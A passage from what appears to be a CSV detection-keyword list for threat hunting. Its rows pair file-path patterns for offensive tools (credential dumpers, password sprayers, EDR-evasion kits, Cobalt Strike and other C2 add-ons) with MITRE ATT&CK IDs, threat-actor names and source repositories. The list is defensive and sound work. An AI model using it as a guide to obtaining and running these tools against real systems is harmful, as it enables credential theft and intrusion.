Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","9434" "*/optiv/Freeze/*",".{0,1000}\/optiv\/Freeze\/.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","9435" "*/oracle-brute.nse*",".{0,1000}\/oracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9436" "*/oracle-brute-stealth.nse*",".{0,1000}\/oracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9437" "*/oracle-enum-users.nse*",".{0,1000}\/oracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9438" "*/oracle-patator.py*",".{0,1000}\/oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","9439" "*/oracle-scanner.py*",".{0,1000}\/oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","9440" "*/oracle-sid-brute.nse*",".{0,1000}\/oracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9441" "*/oracle-tnscmd.py*",".{0,1000}\/oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","9442" "*/oracle-tns-version.nse*",".{0,1000}\/oracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9443" "*/orbitaldump.git*",".{0,1000}\/orbitaldump\.git.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","9444" "*/oscp.profile*",".{0,1000}\/oscp\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based 
detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","9445" "*/OSEP-Code-Snippets.git*",".{0,1000}\/OSEP\-Code\-Snippets\.git.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - 
TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","9446" "*/osmedeus*",".{0,1000}\/osmedeus.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","9451" "*/oSpray.py*",".{0,1000}\/oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","#linux","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","9452" "*/OUned.git*",".{0,1000}\/OUned\.git.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","9453" "*/ouned_smbserver.py*",".{0,1000}\/ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","9454" "*/OUT:killer.exe*",".{0,1000}\/OUT\:killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","9455" "*/out:revsocks.exe*",".{0,1000}\/out\:revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","#linux","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","9456" "*/out:spacerunner.exe*",".{0,1000}\/out\:spacerunner\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","9457" "*/outfile:C:\ProgramData\hashes.txt*",".{0,1000}\/outfile\:C\:\\ProgramData\\hashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9458" "*/outflank_bofs/*",".{0,1000}\/outflank_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9459" "*/outflanknl/*",".{0,1000}\/outflanknl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","9460" "*/Out-Minidump.ps1*",".{0,1000}\/Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9461" "*/output/payloads/*",".{0,1000}\/output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","9462" "*/output/ratchatPT*",".{0,1000}\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","9463" "*/ovs-agent-version.nse*",".{0,1000}\/ovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9464" "*/owa_enum_activesync.py*",".{0,1000}\/owa_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9465" "*/owa_spray_activesync.py*",".{0,1000}\/owa_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9466" "*/OWASP*",".{0,1000}\/OWASP.{0,1000}","offensive_tool_keyword","OWASP","resources and cheat sheet for web attacks techniques","T1190 - T1191 - T1192 - T1210 - T1590 - T1558","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Vulnerability Scanner","https://github.com/OWASP","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9467" 
"*/owa-sprayed-creds.txt*",".{0,1000}\/owa\-sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","#linux","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","9468" "*/owa-valid-users.txt*",".{0,1000}\/owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9469" "*/owneredit.py*",".{0,1000}\/owneredit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9470" "*/p_cve-2014-9322.tar.gz*",".{0,1000}\/p_cve\-2014\-9322\.tar\.gz.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9471" "*/p292/Phant0m*",".{0,1000}\/p292\/Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 
- TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","9472" "*/p2p-conficker.nse*",".{0,1000}\/p2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9473" "*/package/portscan/*.go",".{0,1000}\/package\/portscan\/.{0,1000}\.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","9474" "*/PackMyPayload.git*",".{0,1000}\/PackMyPayload\.git.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","9475" "*/PackMyPayload/*",".{0,1000}\/PackMyPayload\/.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","9476" "*/pacu.git*",".{0,1000}\/pacu\.git.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","9477" "*/padre/pkg/exploit*",".{0,1000}\/padre\/pkg\/exploit.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","9478" "*/paensy.cpp*",".{0,1000}\/paensy\.cpp.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ).
Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","9479" "*/paloalto_enum_globalprotectportal.py*",".{0,1000}\/paloalto_enum_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9493" "*/paloalto_spray_globalprotectportal.py*",".{0,1000}\/paloalto_spray_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9494" "*/pamspy -p *",".{0,1000}\/pamspy\s\-p\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","9495" "*/pamspy.git*",".{0,1000}\/pamspy\.git.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential 